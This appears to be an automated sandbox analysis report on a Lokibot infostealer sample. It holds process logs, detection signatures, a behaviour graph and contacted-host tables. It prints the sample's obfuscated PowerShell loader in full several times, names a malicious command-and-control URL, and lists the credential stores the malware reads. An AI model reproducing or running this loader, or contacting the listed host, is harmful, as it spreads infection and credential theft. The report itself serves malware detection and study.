Ahnf:Titan:RenovTConarlBrimls blte1Inger2Clina ');$samlsnings=$Tracts[0];$Gaveled=(Jomfru Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\syswow64\dxdiag.exe" Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "<#kechel prsidentposten uigennemsigtighederne #>;$overdistantly='interfrontal';<#gadshill slaabrokstil delebrns porulous dolkestdet #>;$vinduesopstninger=$host.privatedata;if ($vinduesopstninger) {$stedlig++;}function jomfruhindes($porteranthus){$aruspex=$acetnaphthalide+$porteranthus.length-$stedlig;for( $nytteomraaders=5;$nytteomraaders -lt $aruspex;$nytteomraaders+=6){$indpresse+=$porteranthus[$nytteomraaders];}$indpresse;}function electroendosmosis($rookus){ & ($bohor) ($rookus);}$dinder=jomfruhindes 'pac imenhjrotretizalkohi.nudelredillalfajafjern/ dopt5she.t. kaff0 stoi anf l(fundawislanistra nleechdha aroreshiwf,ifissemiw undenstavetdesti affi1.rvty0b myn.trykk0diflu;hi si polydwcogiti cypenforka6genda4 isab; afst presnxm elh6uno n4yello;fl,tt steordesp vdanse: svi 1subbi2fopsc1lowba.t,mme0cyto )retri men gadenaeuddancassemk raggo afdo/excl 2 til 0psamm1sadle0 gri 0.uscl1 me u0 org 1 clay geskefponchii,currbuh.sekonomfy glioku,stxfusin/f.rsg1krush2demo.1 fili.micro0rad o ';$amerikanismens=jomfruhindes ' br,suanpris eirienedrirurchi- sulpafjrtegpreteedatabn maritqu ru ';$samlsnings=jomfruhindes 'fantahiliost.adbatunderptuttisgiral:gonor/etho./ kom dzoophr nickia,tagv,ubope fort. duragholdnobrodeose,vegsodallfreefehelve..atiocneph oelse.mmic,o/nat ouartotcreemp?ringoer asyxo,erhpeccafo or arfornjtmarli=lselidudvikooc.oiw.ynton sneklinterom llea.erskdpr gr&b.esniparasd s et= bobs1 dammeanl gx ud,rf.lockxjagtllsuddeodec m5strstdto glnune p8 cham7f rsaf le iwhysteq ,tiks ovack hypeofinanffork 9rizzagn nsuffindi6retairspillfmodst-nyoprp unagh k ipgradioxhydroqfe apj reap8kyste ';$aesthesia=jomfruhindes 'proce>n nna ';$bohor=jomfruhindes 'unintikandieher ixv,ndf ';$yammers='breme';$rytmiseret='\drgs.trs';electroendosmosis (jomfruhindes 'fa tb$forskg isoblspillokikonbkjer.aspro l nth:unimpaokseblforeilpda oetrussnhess dfemkaesal.t=begrl$miljfemetron,edriv rill:glosaa p otpsul mp pja d apioasukketlithoasluse+ rdig$udskirent tyjentrthokeymboo.ei ritis afvieun errbaldrektex,tsvedj ');electroendosmosis (jomfruhindes 'origi$swashgunderlscyl otes dbwhitmapersiludtmm:svaghtsvrmer la nabo ilcomg dtberaks onox=bevrt$sa lesoegenadeponmdipetls,agtsrationbasilihghsrn sp cg.nifosphilo.tilsks persp klipltidspi vivatopryk(tre,j$sty taexen.e romas dvlgt jollhudladeudmatsuntemi eardaunivo)cre,s ');electroendosmosis (jomfruhindes 'scot.[kiksenaedeseskonstlilli.re issskanke ejskr stenv vertipla.icsejlae as.rpdec,mo sansimaternamphitbrynjmhaanda refonskiftahoftegforaaeragmar .off]maane:sa.me:rhopas tffeetennicch,tou ,redr uncoi conctophthytur ep frasrplaygohenbatgifttosanitc snoro hom lgurge nylo,=chizz pu pu[ gildnplissedeepet,rape.encefsparadestinkc capsu tru rdepriib.mbetstatsyangelpnehmirstampo.pritt ,ubloelectc.olleovoldelp eudt,oneaygoba,pfdbflekryds] ahnf:titan:renovtconarlbrimls blte1inger2clina ');$samlsnings=$tracts[0];$gaveled=(jomfru
Source: unknown Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "<#kechel prsidentposten uigennemsigtighederne #>;$overdistantly='interfrontal';<#gadshill slaabrokstil delebrns porulous dolkestdet #>;$vinduesopstninger=$host.privatedata;if ($vinduesopstninger) {$stedlig++;}function jomfruhindes($porteranthus){$aruspex=$acetnaphthalide+$porteranthus.length-$stedlig;for( $nytteomraaders=5;$nytteomraaders -lt $aruspex;$nytteomraaders+=6){$indpresse+=$porteranthus[$nytteomraaders];}$indpresse;}function electroendosmosis($rookus){ & ($bohor) ($rookus);}$dinder=jomfruhindes 'pac imenhjrotretizalkohi.nudelredillalfajafjern/ dopt5she.t. kaff0 stoi anf l(fundawislanistra nleechdha aroreshiwf,ifissemiw undenstavetdesti affi1.rvty0b myn.trykk0diflu;hi si polydwcogiti cypenforka6genda4 isab; afst presnxm elh6uno n4yello;fl,tt steordesp vdanse: svi 1subbi2fopsc1lowba.t,mme0cyto )retri men gadenaeuddancassemk raggo afdo/excl 2 til 0psamm1sadle0 gri 0.uscl1 me u0 org 1 clay geskefponchii,currbuh.sekonomfy glioku,stxfusin/f.rsg1krush2demo.1 fili.micro0rad o ';$amerikanismens=jomfruhindes ' br,suanpris eirienedrirurchi- sulpafjrtegpreteedatabn maritqu ru ';$samlsnings=jomfruhindes 'fantahiliost.adbatunderptuttisgiral:gonor/etho./ kom dzoophr nickia,tagv,ubope fort. duragholdnobrodeose,vegsodallfreefehelve..atiocneph oelse.mmic,o/nat ouartotcreemp?ringoer asyxo,erhpeccafo or arfornjtmarli=lselidudvikooc.oiw.ynton sneklinterom llea.erskdpr gr&b.esniparasd s et= bobs1 dammeanl gx ud,rf.lockxjagtllsuddeodec m5strstdto glnune p8 cham7f rsaf le iwhysteq ,tiks ovack hypeofinanffork 9rizzagn nsuffindi6retairspillfmodst-nyoprp unagh k ipgradioxhydroqfe apj reap8kyste ';$aesthesia=jomfruhindes 'proce>n nna ';$bohor=jomfruhindes 'unintikandieher ixv,ndf ';$yammers='breme';$rytmiseret='\drgs.trs';electroendosmosis (jomfruhindes 'fa tb$forskg isoblspillokikonbkjer.aspro l nth:unimpaokseblforeilpda oetrussnhess dfemkaesal.t=begrl$miljfemetron,edriv rill:glosaa p otpsul mp pja d apioasukketlithoasluse+ rdig$udskirent tyjentrthokeymboo.ei ritis afvieun errbaldrektex,tsvedj ');electroendosmosis (jomfruhindes 'origi$swashgunderlscyl otes dbwhitmapersiludtmm:svaghtsvrmer la nabo ilcomg dtberaks onox=bevrt$sa lesoegenadeponmdipetls,agtsrationbasilihghsrn sp cg.nifosphilo.tilsks persp klipltidspi vivatopryk(tre,j$sty taexen.e romas dvlgt jollhudladeudmatsuntemi eardaunivo)cre,s ');electroendosmosis (jomfruhindes 'scot.[kiksenaedeseskonstlilli.re issskanke ejskr stenv vertipla.icsejlae as.rpdec,mo sansimaternamphitbrynjmhaanda refonskiftahoftegforaaeragmar .off]maane:sa.me:rhopas tffeetennicch,tou ,redr uncoi conctophthytur ep frasrplaygohenbatgifttosanitc snoro hom lgurge nylo,=chizz pu pu[ gildnplissedeepet,rape.encefsparadestinkc capsu tru rdepriib.mbetstatsyangelpnehmirstampo.pritt ,ubloelectc.olleovoldelp eudt,oneaygoba,pfdbflekryds] ahnf:titan:renovtconarlbrimls blte1inger2clina ');$samlsnings=$tracts[0];$gaveled=(jomfru
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "<#kechel prsidentposten uigennemsigtighederne #>;$overdistantly='interfrontal';<#gadshill slaabrokstil delebrns porulous dolkestdet #>;$vinduesopstninger=$host.privatedata;if ($vinduesopstninger) {$stedlig++;}function jomfruhindes($porteranthus){$aruspex=$acetnaphthalide+$porteranthus.length-$stedlig;for( $nytteomraaders=5;$nytteomraaders -lt $aruspex;$nytteomraaders+=6){$indpresse+=$porteranthus[$nytteomraaders];}$indpresse;}function electroendosmosis($rookus){ & ($bohor) ($rookus);}$dinder=jomfruhindes 'pac imenhjrotretizalkohi.nudelredillalfajafjern/ dopt5she.t. kaff0 stoi anf l(fundawislanistra nleechdha aroreshiwf,ifissemiw undenstavetdesti affi1.rvty0b myn.trykk0diflu;hi si polydwcogiti cypenforka6genda4 isab; afst presnxm elh6uno n4yello;fl,tt steordesp vdanse: svi 1subbi2fopsc1lowba.t,mme0cyto )retri men gadenaeuddancassemk raggo afdo/excl 2 til 0psamm1sadle0 gri 0.uscl1 me u0 org 1 clay geskefponchii,currbuh.sekonomfy glioku,stxfusin/f.rsg1krush2demo.1 fili.micro0rad o ';$amerikanismens=jomfruhindes ' br,suanpris eirienedrirurchi- sulpafjrtegpreteedatabn maritqu ru ';$samlsnings=jomfruhindes 'fantahiliost.adbatunderptuttisgiral:gonor/etho./ kom dzoophr nickia,tagv,ubope fort. duragholdnobrodeose,vegsodallfreefehelve..atiocneph oelse.mmic,o/nat ouartotcreemp?ringoer asyxo,erhpeccafo or arfornjtmarli=lselidudvikooc.oiw.ynton sneklinterom llea.erskdpr gr&b.esniparasd s et= bobs1 dammeanl gx ud,rf.lockxjagtllsuddeodec m5strstdto glnune p8 cham7f rsaf le iwhysteq ,tiks ovack hypeofinanffork 9rizzagn nsuffindi6retairspillfmodst-nyoprp unagh k ipgradioxhydroqfe apj reap8kyste ';$aesthesia=jomfruhindes 'proce>n nna ';$bohor=jomfruhindes 'unintikandieher ixv,ndf ';$yammers='breme';$rytmiseret='\drgs.trs';electroendosmosis (jomfruhindes 'fa tb$forskg isoblspillokikonbkjer.aspro l nth:unimpaokseblforeilpda oetrussnhess dfemkaesal.t=begrl$miljfemetron,edriv rill:glosaa p otpsul mp pja d apioasukketlithoasluse+ rdig$udskirent tyjentrthokeymboo.ei ritis afvieun errbaldrektex,tsvedj ');electroendosmosis (jomfruhindes 'origi$swashgunderlscyl otes dbwhitmapersiludtmm:svaghtsvrmer la nabo ilcomg dtberaks onox=bevrt$sa lesoegenadeponmdipetls,agtsrationbasilihghsrn sp cg.nifosphilo.tilsks persp klipltidspi vivatopryk(tre,j$sty taexen.e romas dvlgt jollhudladeudmatsuntemi eardaunivo)cre,s ');electroendosmosis (jomfruhindes 'scot.[kiksenaedeseskonstlilli.re issskanke ejskr stenv vertipla.icsejlae as.rpdec,mo sansimaternamphitbrynjmhaanda refonskiftahoftegforaaeragmar .off]maane:sa.me:rhopas tffeetennicch,tou ,redr uncoi conctophthytur ep frasrplaygohenbatgifttosanitc snoro hom lgurge nylo,=chizz pu pu[ gildnplissedeepet,rape.encefsparadestinkc capsu tru rdepriib.mbetstatsyangelpnehmirstampo.pritt ,ubloelectc.olleovoldelp eudt,oneaygoba,pfdbflekryds] ahnf:titan:renovtconarlbrimls blte1inger2clina ');$samlsnings=$tracts[0];$gaveled=(jomfru Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected Lokibot
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: Process Memory Space: dxdiag.exe PID: 2072, type: MEMORYSTR
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Windows\SysWOW64\dxdiag.exe Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\SysWOW64\dxdiag.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Tries to harvest and steal ftp login credentials
Source: C:\Windows\SysWOW64\dxdiag.exe File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Windows\SysWOW64\dxdiag.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook Jump to behavior

Remote Access Functionality
barindex
Yara detected Lokibot
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: Process Memory Space: dxdiag.exe PID: 2072, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1523160 Sample: PRORA#U010cUNSKA ZAHTEVA 09... Startdate: 01/10/2024 Architecture: WINDOWS Score: 100 30 drive.usercontent.google.com 2->30 32 drive.google.com 2->32 40 Multi AV Scanner detection for domain / URL 2->40 42 Suricata IDS alerts for network traffic 2->42 44 Malicious sample detected (through community Yara rule) 2->44 46 7 other signatures 2->46 8 powershell.exe 18 2->8         started        11 wscript.exe 1 2->11         started        signatures3 process4 signatures5 48 Writes to foreign memory regions 8->48 50 Found suspicious powershell code related to unpacking or dynamic code loading 8->50 13 dxdiag.exe 1 94 8->13         started        18 conhost.exe 8->18         started        20 msiexec.exe 8->20         started        24 10 other processes 8->24 52 Suspicious powershell command line found 11->52 54 Wscript starts Powershell (via cmd or directly) 11->54 56 Windows Scripting host queries suspicious COM object (likely to drop second stage) 11->56 58 Suspicious execution chain found 11->58 22 powershell.exe 14 18 11->22         started        process6 dnsIp7 34 137.184.191.215, 49715, 49716, 49717 PANDGUS United States 13->34 28 C:\Users\user\AppData\Roaming\...\31437F.exe, PE32 13->28 dropped 60 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 13->60 62 Tries to steal Mail credentials (via file / registry access) 13->62 64 Tries to harvest and steal ftp login credentials 13->64 68 2 other signatures 13->68 36 drive.usercontent.google.com 142.250.184.193, 443, 49705, 49714 GOOGLEUS United States 22->36 38 drive.google.com 142.250.184.238, 443, 49704, 49713 GOOGLEUS United States 22->38 66 Found suspicious powershell code related to unpacking or dynamic code loading 22->66 26 conhost.exe 22->26         started        file8 signatures9 process10
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
142.250.184.193
 drive.usercontent.google.com United States
15169 GOOGLEUS false
137.184.191.215
 unknown United States
11003 PANDGUS true
142.250.184.238
 drive.google.com United States
15169 GOOGLEUS false

Contacted Domains

Name IP Active
drive.google.com 142.250.184.238 true
drive.usercontent.google.com 142.250.184.193 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://137.184.191.215/index.php/check.php?id=1 true unknown